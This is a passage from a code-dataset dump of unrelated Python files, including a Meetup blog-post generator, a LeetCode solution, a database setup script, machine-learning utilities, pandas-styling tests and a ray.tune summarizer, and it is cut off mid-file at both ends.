requests.get(url, params=params)\n data = response.json()[0]\n\n data[\"time\"] = data[\"time\"] / 1000 # MeetUp gives timestamp in milliseconds\n data[\"updated\"] = data[\"updated\"] / 1000 # MeetUp gives timestamp in milliseconds\n\n event = Event(venue_name=data[\"venue\"][\"name\"], **data)\n return event\n\ndef generate_post_filename(event):\n \"\"\"Generates the filename for the event's post\"\"\"\n return event.when.strftime(\"%B-%Y-meetup.md\").lower()\n\ndef get_template_path(template_name):\n \"\"\"Get the path to the template file that will be copied\"\"\"\n return os.path.join(\"./scaffolds\", template_name + \".md\")\n\ndef process_placeholders(filename, event):\n \"\"\"Returns processing the placeholders in the filename with values from the event\"\"\"\n content = \"\"\n values = event.__dict__\n with open(filename, mode=\"r\") as post_file:\n for line in post_file:\n content += line.format(**values)\n return content\n\ndef get_git_url(config_filename, path_to_git_setting):\n \"\"\"Reads the git url from the given yaml config file\"\"\"\n config = reyaml.load_from_file(config_filename)\n return reduce((lambda cur, item: cur[item]), path_to_git_setting.split(\"/\"), config)\n\ndef commit_post(filename, git_url, message=\"Auto commit by thePutter\", branch_name=\"master\"):\n \"\"\"Stages, commits, and pushes the created post\"\"\"\n if did_post_change(filename):\n print(\"Post changed: %s, pushing it.\" % filename)\n run([\"git\", \"remote\", \"rm\", \"putter\"])\n run([\"git\", \"remote\", \"add\", \"putter\", git_url])\n run([\"git\", \"add\", filename])\n run([\"git\", \"commit\", \"-m\", message])\n\n # The build runs in detached head state. This works, but, I'm not sure\n # what sideeffects this may have. Something I'll look into.\n run([\"git\", \"push\", \"putter\", \"HEAD:\" + branch_name])\n else:\n print(\"Post did NOT change: %s\" % filename)\n\ndef did_post_change(filename):\n \"\"\"Checks if the post filename changed or was created due to the generation process\"\"\"\n status = run([\"git\", \"status\", \"-s\"], stdout=PIPE, universal_newlines=True).stdout\n lines = status.split(\"\\n\")\n if \" M %s\" % filename in lines or \"?? %s\" % filename in lines:\n return True\n else:\n return False\n\ndef generate_post(template, destination_folder, event):\n \"\"\"Generates event post file\"\"\"\n\n # Create initial post from template\n file_name = generate_post_filename(event)\n full_filename = destination_folder + \"/\" + file_name\n copyfile(template, full_filename)\n\n content = process_placeholders(full_filename, event)\n\n # Saving processed content\n with open(full_filename, mode=\"w\") as post_file:\n for line in content:\n post_file.write(line)\n\n return full_filename\n\ndef get_putter_config(filename=\"thecodeputter.yml\"):\n \"\"\"Gets the config to use for processing\"\"\"\n return reyaml.load_from_file(filename)\n\ndef putt():\n \"\"\"Runs the processing\"\"\"\n config = get_putter_config()\n event = get_next_event(config[\"meetup_apikey\"], config[\"meetup_root\"], config[\"group_name\"])\n event.set_timezone(timezone(config[\"group_timezone\"]))\n template_path = get_template_path(config[\"template_name\"])\n post_filename = generate_post(template_path, config[\"posts_path\"], event)\n\n git_url = get_git_url(config[\"yaml_filename\"], config[\"yaml_query\"])\n commit_post(post_filename, git_url, branch_name=config[\"posts_branch\"])\n\nif __name__ == \"__main__\":\n putt() # FORE!\n","sub_path":"put-meetup-event.py","file_name":"put-meetup-event.py","file_ext":"py","file_size_in_byte":5050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"168170520","text":"'''\n// Source : https://oj.leetcode.com/problems/single-number/\n// Author : Hal\n// Date : 2019-12-07\n\n/**********************************************************************************\n*\n* Given an array of integers, every element appears twice except for one. Find that single one.\n*\n* Note:\n* Your algorithm should have a linear runtime complexity. Could you implement it without using extra memory?\n*\n*\n**********************************************************************************/\n'''\n\nclass Solution:\n \n def singleNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n hash = {}\n for num in nums:\n try:\n hash.pop(num)\n except:\n hash[num] = 1\n\n for key in hash.keys():\n return(key)\n","sub_path":"algorithms/python/SingleNumber/singleNumber.py","file_name":"singleNumber.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"28396641","text":"from os import strerror as strerr\nimport sys\n\nbfr = open(sys.argv[1], 'r')\nctn: list = [i for i in bfr.read()]\ncontents: list = []\nfor i in ctn:\n contents.append(int(i, 16))\n\ndata = bytearray(len(contents))\n\nfor i in range(len(data)):\n data[i] = contents[i]\ntry:\n bfw = open(sys.argv[1], 'wb')\n bfw.write(data)\n bfw.close()\n bfr.close()\nexcept IOError as e:\n print(\"I/O error occurred:\", strerr(e.errno))","sub_path":"src/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"625128588","text":"#!/usr/bin/python3\nimport psycopg2\nimport sys\n\nretry=5\nwhile retry:\n try:\n database='ups'\n conn = psycopg2.connect(database='postgres',\\\n user='postgres', \n host='db', port='5432')\n\n print(\"Opened database %s successfully.\" % database)\n break\n except:\n print(\"Failed to connect to database %s.\", database)\n time.sleep(3)\n retry-=1\n\n\ntry: \n cur = conn.cursor()\n cur.execute('''DROP TABLE IF EXISTS service_package CASCADE;''')\n cur.execute('''DROP TABLE IF EXISTS service_truck CASCADE;''')\n # cur.execute('''DROP TABLE IF EXISTS service_account CASCADE;''')\n\n conn.commit()\nexcept:\n print (sys.exc_info())\n print ('Error: Drop tables')\n pass\n\n\n\"\"\"\ntry:\n cur = conn.cursor()\n cur.execute('''CREATE TABLE service_account(\n user_id int,\n username TEXT PRIMARY KEY\n );''')\n\n # cur.execute('''INSERT INTO service_account VALUES ('Jiaran');''')\n # cur.execute('''INSERT INTO service_account VALUES ('Yanjia');''')\n \n conn.commit()\n\nexcept:\n print (sys.exc_info())\n print ('Table may already exist.')\n pass\n\"\"\"\n\ntry:\n cur.execute('''CREATE TABLE service_truck(\n truck_id int PRIMARY KEY,\n x int,\n y int,\n status TEXT\n );''')\n \n conn.commit()\n\nexcept:\n print (sys.exc_info())\n print ('Table may already exist.')\n pass\n\ntry:\n cur.execute('''CREATE TABLE service_package(\n package_id int PRIMARY KEY,\n wh_id int,\n w_x int,\n w_y int,\n d_x int,\n d_y int,\n truck_id int,\n loaded boolean,\n acc_id TEXT,\n status TEXT,\n waiting boolean,\n loading boolean,\n delivering boolean,\n delivered boolean,\n waiting_t TEXT,\n loading_t TEXT,\n delivering_t TEXT,\n delivered_t TEXT,\n FOREIGN KEY(acc_id) REFERENCES service_account(username),\n FOREIGN KEY(truck_id) REFERENCES service_truck(truck_id)\n );''')\n \n conn.commit()\n\nexcept:\n print (sys.exc_info())\n print ('Table may already exist.')\n pass\n\nconn.close()\n","sub_path":"UPS-docker/web-app/src/database_setup.py","file_name":"database_setup.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"548349057","text":"# LSTM neural network\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport re\n\n\n# Importing RNN word to int mapping\nimport pickle\n\nword_to_int = pickle.load(open(os.path.join(os.getcwd(), 'models', 'RNN_word_to_int.pkl'), 'rb'))\n\nseq_len = 200 # as used in training\nbatch_size = 64\nn_words = len(word_to_int)+1\nembed_size = 256\nlstm_layers = 1\nlstm_size = 128\n\ndef preprocessing(text):\n # Removing the tags\n text = re.sub('<[^>]*>', '', text)\n # Extracting the emoticons\n emoticons = re.findall('(?::|;|=)(?:-)?(?:\\)|\\(|D|P)', text)\n text = re.sub('[\\W]+', ' ', text.lower()) + ' '.join(emoticons).replace('-','')\n return text\n\n\ndef classify(review):\n review = preprocessing(review)\n mapped_review = []\n for word in review.split():\n if word in word_to_int.keys():\n mapped_review.append(word_to_int[word])\n else:\n mapped_review.append(0)\n seq = np.zeros((1,seq_len),dtype = int)\n review_arr = np.array(mapped_review)\n seq[0,-len(mapped_review):] = review_arr[-seq_len:]\n with tf.Session() as sess:\n # Change to that directory where your saved model is\n\n saver = tf.train.import_meta_graph(os.path.join(os.getcwd(), \"models\", \"CNN\",\"senti-59.ckpt.meta\"))\n saver.restore(sess, tf.train.latest_checkpoint(os.path.join(os.getcwd(), \"models\", \"CNN\")))\n # not using dropout in testing\n graph = tf.get_default_graph()\n tf_x = graph.get_tensor_by_name(\"inputs/tf_x:0\")\n tf_keepprob = graph.get_tensor_by_name(\"inputs/tf_keepprob:0\")\n y_prob = graph.get_tensor_by_name(\"output/predict:0\")\n feed = {tf_x: seq, tf_keepprob: 1.0}\n pred = sess.run([y_prob],feed_dict=feed)\n pred = pred[0][0]\n if round(pred) == 0:\n res = \"Negative\"\n else:\n res = \"Positive\"\n # low probability means it is a mixed review\n return res, pred\n\n","sub_path":"classifier_deployments/CNN_testing.py","file_name":"CNN_testing.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"10526463","text":"# -*-coding:utf-8-*-\nimport sys\nimport random\n\nsys.path.insert(0, \"/opt/densenet.mxnet\")\n\nimport os\nimport time\nimport argparse\nimport shutil\n\nfrom sign_labels import sign_total_labels\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--label_dir', type=str, required=True)\n parser.add_argument('--dataset_dir', type=str, required=True)\n args = parser.parse_args()\n\n label_map = {}\n label_name = {}\n for label in sign_total_labels:\n label_map[label.label] = label.categoryId\n label_name[label.label] = label.name\n\n label_dir = args.label_dir\n dataset_dir = args.dataset_dir\n\n if not os.path.exists(label_dir):\n print(\"dir[{}] is not exist\".format(label_dir))\n exit(0)\n if not os.path.exists(dataset_dir):\n os.makedirs(dataset_dir)\n\n time_start = time.time()\n\n class_file = {}\n dir_list = os.listdir(label_dir)\n for dir_name in dir_list:\n dir_path = os.path.join(label_dir, dir_name)\n if os.path.isdir(dir_path):\n label_file = os.path.join(dir_path, \"ImageType.csv\")\n if not os.path.exists(label_file):\n continue\n else:\n continue\n\n with open(label_file, \"r\") as f:\n line_str = f.readline()\n # skip first line\n line_str = f.readline()\n while line_str:\n line_str = line_str.strip()\n image_name, class_id = line_str.split(\",\")\n\n train_id = label_map[class_id]\n class_name = label_name[class_id]\n\n # path = os.path.join(dataset_dir, \"origin\", class_name.encode(\"UTF-8\"))\n # if not os.path.exists(path):\n # os.makedirs(path)\n # shutil.copy(os.path.join(label_dir, dir_name, image_name),\n # os.path.join(path, os.path.basename(image_name)))\n path = os.path.join(dataset_dir, \"origin_1\", class_id)\n if not os.path.exists(path):\n os.makedirs(path)\n shutil.copy(os.path.join(label_dir, dir_name, image_name),\n os.path.join(path, os.path.basename(image_name)))\n\n if train_id not in class_file:\n class_file[train_id] = []\n class_file[train_id].append(os.path.join(dir_name, image_name))\n line_str = f.readline()\n\n chose_count = 1000\n for train_id, file_list in class_file.items():\n if len(file_list) > chose_count:\n random.seed(random.randint(10, 100))\n random.shuffle(file_list)\n chose_list = file_list[:chose_count]\n else:\n chose_list = file_list\n\n id_dir = os.path.join(dataset_dir, str(train_id))\n if not os.path.exists(id_dir):\n os.makedirs(id_dir)\n\n for file_id in chose_list:\n shutil.copy(src=os.path.join(label_dir, file_id),\n dst=os.path.join(id_dir, os.path.basename(file_id)))\n\n time_end = time.time()\n print(\"finish in {} s\".format(time_end - time_start))","sub_path":"sign_classfication/make_train_3.py","file_name":"make_train_3.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"276422318","text":"import copy\nfrom operator import itemgetter\n\nimport pytest\nimport numpy\nimport pandas\n\nfrom prettypandas import PrettyPandas\n\n\n@pytest.fixture()\ndef dataframe():\n numpy.random.seed(24)\n df = pandas.DataFrame({'A': numpy.linspace(1, 10, 10)})\n df = pandas.concat([df, pandas.DataFrame(numpy.random.randn(10, 4),\n columns=list('BCDE'))],\n axis=1)\n return df\n\n\n@pytest.fixture()\ndef prettyframe(dataframe):\n return PrettyPandas(dataframe, precision=1)\n\n@pytest.fixture()\ndef nan_dataframe():\n return pandas.DataFrame({\n 'vals-a': [1, 2, 3, 10, 7, 6],\n 'vals-b': [3, 4, 3, 6, 5, 5],\n 'vals-a-nan': [1, 2, numpy.nan, 10, 7, 6],\n 'vals-b-nan': [3, numpy.nan, 3, 6, 5, numpy.nan],\n 'weights': [1, 2, 1, 1, 3, 2],\n 'weights-nan': [1, 2, 1, 1, numpy.nan, 2],\n 'percent col': [0.1, 0.2, numpy.nan, 0.3, 0.4, 0.5],\n 'big-vals': [1e3, 10e3, 1e6, 10e6, numpy.nan, numpy.nan],\n 'groups': ['a', 'b', 'a', 'b', 'c', 'c'],\n 'groups-nan': [numpy.nan, 'b', 'a', numpy.nan, 'c', 'c'],\n 'groups2': ['x', 'x', 'x', 'y', 'y', 'y'],\n 'date': pandas.date_range(start = pandas.Timestamp(2020, 1, 1),\n periods = 6).values\n })\n\ndef test_creation(dataframe):\n PrettyPandas(dataframe)\n\n try:\n PrettyPandas(None)\n except TypeError:\n assert True\n\n p1 = PrettyPandas(dataframe, precision=2)\n assert p1.precision == 2\n assert p1.summary_rows == {}\n assert p1.summary_cols == {}\n assert p1.formatters == []\n\n p2 = PrettyPandas(dataframe).total(title = 'test')\n assert 'test' in p2.summary_rows\n assert p1.summary_cols == {}\n assert p1.formatters == []\n\n\ndef test_data_safety(dataframe):\n df1 = copy.deepcopy(dataframe)\n\n df = PrettyPandas(dataframe, precision=1)\n df.total()._translate()\n\n assert all(dataframe == df1)\n assert all(df.data == df1)\n\n\ndef test_summary(dataframe):\n p1 = PrettyPandas(dataframe, precision=1).total()\n actual = list(p1.data.sum())\n\n r = p1._translate()\n row = [cell for cell in r['body'][10] if cell['type'] == 'td']\n values = [cell['value'] for cell in sorted(row, key=itemgetter('id'))]\n\n assert values == actual\n\n\ndef test_summary_fns(dataframe):\n PrettyPandas(dataframe).total()\n PrettyPandas(dataframe).average()\n PrettyPandas(dataframe).median()\n PrettyPandas(dataframe).max()\n PrettyPandas(dataframe).min()\n\n out = PrettyPandas(dataframe).total()\n assert len(out.summary_rows) == 1\n assert len(out.summary_cols) == 0\n\n out = PrettyPandas(dataframe).total(axis='columns')\n assert len(out.summary_rows) == 0\n assert len(out.summary_cols) == 1\n\n out = PrettyPandas(dataframe).total(axis=None)\n assert len(out.summary_rows) == 1\n assert len(out.summary_cols) == 1\n\n out = PrettyPandas(dataframe).min().max()\n assert len(out.summary_rows) == 2\n assert len(out.summary_cols) == 0\n\n out = PrettyPandas(dataframe).min().max(axis='cols')\n assert len(out.summary_rows) == 1\n assert len(out.summary_cols) == 1\n\n\ndef test_mulitindex():\n df = pandas.DataFrame({'A': [1, 2],\n 'B': [3, 4],\n 'D': [4, 3],\n 'C': [6, 7]})\n\n output = PrettyPandas(df.set_index(['A', 'B'])).total(axis='cols')._translate()\n\n for row in output['body']:\n assert row[-1]['value'] == 10\n\n headings = {style['value']: style['class']\n for style in output['head'][0]}\n assert headings == {'A': 'index_name level0',\n 'B': 'index_name level1',\n 'C': 'col_heading level0 col1',\n 'D': 'col_heading level0 col0',\n 'Total': 'col_heading level0 col2',}\n\n\ndef test_as_percent(prettyframe):\n p = prettyframe.as_percent()._translate()\n\n cells = []\n for row in p['body']:\n values = [cell['value'] for cell in row if cell['type'] == 'td']\n cells.extend(values)\n\n assert all(c.endswith('%') for c in cells)\n\n\ndef test_as_currency(prettyframe):\n p = prettyframe.as_currency(locale='en_US', currency='USD')._translate()\n\n cells = []\n for row in p['body']:\n values = [cell['value'] for cell in row if cell['type'] == 'td']\n cells.extend(values)\n\n assert all(c.startswith('US$') or c.startswith('-US$') for c in cells)\n\n\ndef test_as_unit(prettyframe):\n p = prettyframe.as_unit('cm', location='suffix')._translate()\n\n cells = []\n for row in p['body']:\n values = [cell['value'] for cell in row if cell['type'] == 'td']\n cells.extend(values)\n\n assert all(c.endswith('cm') for c in cells)\n\n\ndef test_fillna(nan_dataframe):\n pp = PrettyPandas(nan_dataframe, fillna='#NA').as_number(exclude = ['groups', 'groups-nan', 'groups2', 'date'])\n formatted_df = pp.get_formatted_df()\n\n pandas.testing.assert_frame_equal(formatted_df == '#NA',\n nan_dataframe.isnull())\n\ndef test_as_date(nan_dataframe):\n pp = PrettyPandas(nan_dataframe, fillna='#NA').as_date(subset = ['date'])\n formatted_df = pp.get_formatted_df()\n\n pandas.testing.assert_series_equal(formatted_df['date'],\n (nan_dataframe['date'].apply(lambda d: str(d.date()) if pandas.notnull(d) else '#NA')))\n\ndef test_auto_format(nan_dataframe):\n pp = (\n PrettyPandas(nan_dataframe, fillna='#NA')\n .as_unit('£', precision=2, subset = ['vals-b'])\n .auto_format(float_precision=0, percent_precision=1)\n )\n formatted_df = pp.get_formatted_df()\n\n pandas.testing.assert_series_equal(formatted_df['date'],\n (nan_dataframe['date'].apply(lambda d: str(d.date()) if pandas.notnull(d) else '#NA')))\n pandas.testing.assert_series_equal(formatted_df['percent col'],\n (nan_dataframe['percent col'].apply(lambda v: f'{v:.1%}' if pandas.notnull(v) else '#NA')))\n pandas.testing.assert_series_equal(formatted_df['big-vals'],\n (nan_dataframe['big-vals'].apply(lambda v: f'{v:,.0f}' if pandas.notnull(v) else '#NA')))\n pandas.testing.assert_series_equal(formatted_df['vals-b'],\n (nan_dataframe['vals-b'].apply(lambda v: f'£{v:,.2f}' if pandas.notnull(v) else '#NA')))\n\ndef test_multi_index_summary_row(nan_dataframe):\n nan_dataframe.index = pandas.MultiIndex.from_product([[0], nan_dataframe.index])\n nan_dataframe.columns = pandas.MultiIndex.from_product([[0], nan_dataframe.columns])\n\n PrettyPandas(nan_dataframe).total(exclude=[(0,'groups'), (0,'groups-nan'), (0,'groups2'), (0, 'date')])\n\n\ndef test_multi_index_summary_rcol(nan_dataframe):\n nan_dataframe.index = pandas.MultiIndex.from_product([[0], nan_dataframe.index])\n nan_dataframe.columns = pandas.MultiIndex.from_product([[0], nan_dataframe.columns])\n\n PrettyPandas(nan_dataframe.T).total(exclude=[(0, 'groups'), (0, 'groups-nan'), (0, 'groups2'), (0, 'date')], axis='cols')\n\ndef test_total_or_wavg(dataframe):\n\n lhs_array = dataframe.sum()\n wavg_b = numpy.average(dataframe.B, weights=dataframe.A)\n wavg_c = numpy.average(dataframe.C, weights=dataframe.A)\n\n #case 1: no wavg_subset -> all sums\n df_pp = PrettyPandas(dataframe).total_or_wavg()\n total_or_wa_row = df_pp.summary_rows['Total / WA'].values\n assert numpy.array_equiv(lhs_array, total_or_wa_row)\n\n #case 2: some wavg (default sums)\n df_pp = PrettyPandas(dataframe).total_or_wavg(wavg_subset=['B', 'C'],\n w_field='A')\n total_or_wa_row = df_pp.summary_rows['Total / WA'].values\n lhs_array['B':'C'] = [wavg_b, wavg_c]\n assert numpy.array_equiv(lhs_array, total_or_wa_row)\n\n #case 3: spcify sum_subset / exclude\n df_pp = PrettyPandas(dataframe).total_or_wavg(wavg_subset=['B', 'C'],\n w_field='A', \n sum_subset=['A', 'D'])\n total_or_wa_row = df_pp.summary_rows['Total / WA'].values\n\n lhs_array['E'] = None\n assert numpy.allclose(lhs_array, total_or_wa_row, equal_nan=True)\n\n df_pp = PrettyPandas(dataframe).total_or_wavg(wavg_subset=['B', 'C'],\n w_field='A', \n exclude=['E'])\n total_or_wa_row = df_pp.summary_rows['Total / WA'].values\n assert numpy.allclose(lhs_array, total_or_wa_row, equal_nan=True)\n \n #case 4: wavgs only\n df_pp = PrettyPandas(dataframe).total_or_wavg(wavg_subset=['B', 'C'],\n w_field='A', \n default_sum=False)\n total_or_wa_row = df_pp.summary_rows['Total / WA'].values\n\n lhs_array['A'] = None\n lhs_array['D'] = None\n assert numpy.allclose(lhs_array, total_or_wa_row, equal_nan=True)\n \n","sub_path":"test/test_pretty_pandas.py","file_name":"test_pretty_pandas.py","file_ext":"py","file_size_in_byte":9041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"297126629","text":"from hostlist import expand_hostlist\nfrom cloudmesh.common.dotdict import dotdict\n\nclass Parameter(object):\n @classmethod\n def expand(cls, parameter, allow_duplicates=False, sort=False):\n \"\"\"\n Parameter.expand(\"a[0-1]\") -> [\"a0\", \"a1\"]\n :param parameter:\n :param allow_duplicates:\n :param sort:\n :return:\n \"\"\"\n if parameter is None:\n return parameter\n else:\n return expand_hostlist(parameter, allow_duplicates=False, sort=False)\n\n @staticmethod\n def find(name, *dicts):\n \"\"\"\n Finds the value for the key name in multiple dicts\n\n :param name: the key to find\n :param dicts: the list of dicts\n :return:\n \"\"\"\n for d in dicts:\n if type(d) == str:\n return d\n elif name in d and d[name] is not None:\n return d[name]\n\n return None\n\n @staticmethod\n def find_bool(name, *dicts):\n \"\"\"\n Finds the value for the key name in multiple dicts\n\n :param name: the key to find\n :param dicts: the list of dicts\n :return:\n \"\"\"\n value = False\n\n for d in dicts:\n if type(d) == str:\n value = d == 'True'\n elif name in d:\n value = d[name]\n if type(value) == str:\n value = value == 'True'\n\n if value:\n return True\n\n return False\n\n @staticmethod\n def arguments_to_dict(arguments):\n \"\"\"\n converts a string of the form \"a=1,b=2\" to a dict\n {\"a\":\"1\", \"b\":\"2\"}\n all values are strings\n\n :param arguments: the argument string\n :return: a dic of argument and values\n \"\"\"\n if arguments is None or len(arguments) == 0:\n return None\n parameters = {}\n for argument in arguments:\n key, value = arguments.split(\"=\", 1)\n parameters[key] = value\n return parameters\n\n","sub_path":"cloudmesh/common/parameter.py","file_name":"parameter.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"518083565","text":"'''\n The Hera Callback\n'''\n\nfrom __future__ import absolute_import\nimport json\n\nfrom keras.callbacks import Callback\nfrom heraspy.util import to_jsonable_dict\n\nfrom heraspy.events import (\n TRAIN_BEGIN, TRAIN_END,\n EPOCH_BEGIN, EPOCH_END,\n BATCH_END\n)\n\nclass HeraCallback(Callback):\n\n '''\n A Keras callback streaming data to a hera socket server\n '''\n\n def __init__(self, namespace, dispatcher, hera_config=None):\n\n self.dispatcher = dispatcher\n self.namespace = namespace\n self.hera_config = hera_config\n self.current_epoch = 0\n self.batch_idx = 0\n\n super(HeraCallback, self).__init__()\n\n def on_train_begin(self, *args):\n self.dispatcher(\n self.namespace,\n TRAIN_BEGIN,\n {\n 'params': self.params,\n 'modelJson': json.loads(self.model.to_json()),\n }\n )\n\n\n def on_train_end(self, *args):\n\n self.dispatcher(\n self.namespace,\n TRAIN_END,\n None\n )\n\n\n def on_epoch_begin(self, epoch, *args):\n self.current_epoch = epoch\n self.dispatcher(\n self.namespace,\n EPOCH_BEGIN,\n {\n 'epoch': epoch,\n 'batchIdx': self.batch_idx,\n 'params': self.params\n }\n )\n\n def on_epoch_end(self, epoch, *args):\n self.dispatcher(\n self.namespace,\n EPOCH_END,\n {\n 'epoch': epoch,\n 'params': self.params\n }\n )\n\n def on_batch_end(self, batch, logs):\n self.dispatcher(\n self.namespace,\n BATCH_END,\n {\n 'batch': batch,\n 'epoch': self.current_epoch,\n 'idx': self.batch_idx,\n 'metricData': to_jsonable_dict(\n dict([\n (metric, logs[metric])\n for metric in self.params['metrics']\n if metric in logs\n ])\n ),\n }\n )\n self.batch_idx += 1\n\n","sub_path":"heraspy/callback.py","file_name":"callback.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"154388484","text":"import tensorflow as tf\nimport numpy as np\nclass Convolution():\n \n def __init__(self,filters,kernels,padding,stride,activation) :\n self.filters = filters\n self.kernels = kernels\n self.padding = padding\n self.stride = stride\n self.bias = np.random.normal(size=(3,3))\n self.activation = activation\n\n def doConvolution(self,inputs,kernels, bias):\n \n (inputs_prev_height, inputs,prev_width) = inputs.shape\n (curr_height, curr_width) = kernels.shape\n\n output_height = int(int(inputs_prev_height + 2 * self.padding - curr_height) / self.stride + 1)\n output_width = int(int(inputs_prev_height + 2 * self.padding - curr_width) / self.stride + 1)\n \n output = tf.zeros(shape=(output_height,output_width)).numpy()\n padded_inputs = self.zeroPadding(inputs)\n slice_padded_inputs = tf.zeros(shape=(padded_inputs.shape))\n for height in range(output_height):\n vertical_start = self.stride * height\n vertical_end = vertical_start + curr_height\n for width in range(output_width):\n horiz_start = self.stride*width\n horiz_end = horiz_start + curr_width\n\n slice_padded_inputs = padded_inputs[vertical_start:vertical_end,horiz_start:horiz_end]\n output[height,width] = self.convComputation(slice_padded_inputs,self.kernels,self.bias)\n\n return output\n\n def convComputation(self,inputs,Weights, Bias):\n i_w = tf.multiply(inputs, Weights)\n i_w = tf.reduce_sum(i_w, axis= None)\n i_w = i_w + Bias\n return i_w\n\n\n def zeroPadding(self,image):\n \"Only Works With 2D Image\"\n \"Padd the whole image \"\n\n return tf.pad(image,( (self.padding, self.padding), (self.padding,self.padding) ))\n\nif __name__ == \"__main__\":\n tf.random.set_seed(5)\n inputs = tf.random.normal(shape=(5,5))\n\n weights = tf.random.normal(shape=(3,3))\n bias = tf.random.normal(shape=(1,1))\n\n ","sub_path":"convolution.py","file_name":"convolution.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"196782635","text":"\"\"\"\nAnalyze a ray.tune run; plot training curves, show best run etc.\n\"\"\"\n\nimport argparse\nfrom typing import Dict, Any\nfrom ray.tune.analysis import Analysis\nimport os\nimport shutil\nimport glob2\nfrom shutil import copyfile\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nDEFAULT_TRAIN_METRIC = 'loss_train'\nDEFAULT_VALID_METRIC = 'loss_eval'\n#BASE_PATH = '/Net/Groups/BGI/work_3/LSTM_CO2flux_upscaling/lstm_fluxnet/experiments/'\n#DEFAULT_TARGET_BASE_DIR = '/Net/Groups/BGI/work_3/LSTM_CO2flux_upscaling/lstm_fluxnet/experiments/'\n\ndef summarize_run(store):\n summarize(\n path=store,\n overwrite=True)\n\ndef summarize(\n path: str,\n train_metric: str = DEFAULT_TRAIN_METRIC,\n eval_metric: str = DEFAULT_VALID_METRIC,\n overwrite: bool = False) -> None:\n\n print(f'\\nLoading experiment from: \\n{path}\\n')\n\n #if not os.path.isfile(path):\n # raise ValueError(f'Path does not exist or is directory:\\n{path}')\n #if path[-5:] != '.json':\n # raise ValueError(f'Not a .json file:\\n{path}')\n\n #path_split = path.split(BASE_PATH)[1].split('/')\n #var = path_split[0]\n #name = path_split[1]\n #mode = path_split[2]\n summary_dir = os.path.join(path, 'summary')\n\n if os.path.isdir(summary_dir):\n if not overwrite:\n raise ValueError(\n f'Target directory `{summary_dir}` exists, use `--overwrite` to replace.')\n shutil.rmtree(summary_dir)\n os.makedirs(summary_dir)\n \n exp = Analysis(path)\n\n configs = exp.dataframe()\n configs['rundir'] = [os.path.join(l, 'progress.csv')\n for l in configs['logdir']]\n runs = []\n for i, f in enumerate(configs['rundir']):\n df = pd.read_csv(f)\n df['uid'] = i\n runs.append(df)\n runs = pd.concat(runs)\n\n best_run_dir = exp.get_best_logdir(eval_metric, mode='min')\n best_run_file = os.path.join(best_run_dir, 'progress.csv')\n best_run = pd.read_csv(best_run_file)\n\n print(f'Best run ID: {best_run_dir}')\n\n for f in ['json', 'pkl']:\n in_file = os.path.join(best_run_dir, f'params.{f}')\n out_file = os.path.join(summary_dir, f'best_params.{f}')\n \n copyfile(in_file, out_file)\n\n # Plot runs.\n plot_all(runs, eval_metric, os.path.join(summary_dir, 'all_runs.png'))\n plot_single(best_run, eval_metric, os.path.join(\n summary_dir, 'best_run.png'))\n\ndef plot_all(runs: pd.core.frame.DataFrame, metric: str, savepath: str) -> None:\n fig, ax = plt.subplots(1, 2, figsize=(\n 8, 6), sharex=True, sharey='row', gridspec_kw={'wspace': 0, 'hspace': 0})\n box = dict(facecolor='yellow', pad=6, alpha=0.2)\n\n ax[0].text(\n 1.0, 1.0, 'HYPERBAND OPTIMIZATION', transform=ax[0].transAxes,\n horizontalalignment='center', verticalalignment='bottom', fontweight='bold')\n ax[0].text(\n 0.5, 0.98, 'TRAINING', transform=ax[0].transAxes,\n horizontalalignment='center', verticalalignment='top', bbox=box)\n ax[1].text(\n 0.5, 0.98, 'VALIDATION', transform=ax[1].transAxes,\n horizontalalignment='center', verticalalignment='top', bbox=box)\n\n train_name = DEFAULT_TRAIN_METRIC\n valid_name = DEFAULT_VALID_METRIC\n\n runs.groupby(['uid']).plot(\n x='epoch', y=train_name, ax=ax[0], legend=False)\n runs.groupby(['uid']).plot(\n x='epoch', y=valid_name, ax=ax[1], legend=False)\n\n ymin = np.min((\n np.min(runs[train_name]),\n np.min(runs[valid_name]))) * 0.9\n ymax = np.max(\n (np.percentile(runs[train_name], 95), np.percentile(runs[valid_name], 95)))\n xmin = np.min(runs['epoch'])-np.max(runs['epoch'])*0.01\n xmax = np.max(runs['epoch'])*1.01\n\n ax[0].set_xlim(xmin, xmax)\n ax[0].set_ylim(ymin, ymax)\n ax[0].yaxis.set_label_coords(-0.15, 0.5, transform=ax[0].transAxes)\n ax[0].set_ylabel('loss', bbox=box)\n\n fig.savefig(savepath, bbox_inches='tight', dpi=200, transparent=True)\n\n\ndef plot_single(single_run: pd.core.frame.DataFrame, metric: str, savepath: str) -> None:\n fig, ax = plt.subplots(1, 2, figsize=(\n 8, 6), sharex=True, sharey='row', gridspec_kw={'wspace': 0, 'hspace': 0})\n box = dict(facecolor='yellow', pad=6, alpha=0.2)\n\n ax[0].text(\n 1.0, 1.0, 'BEST RUN', transform=ax[0].transAxes,\n horizontalalignment='center', verticalalignment='bottom', fontweight='bold')\n ax[0].text(\n 0.5, 0.98, 'TRAINING', 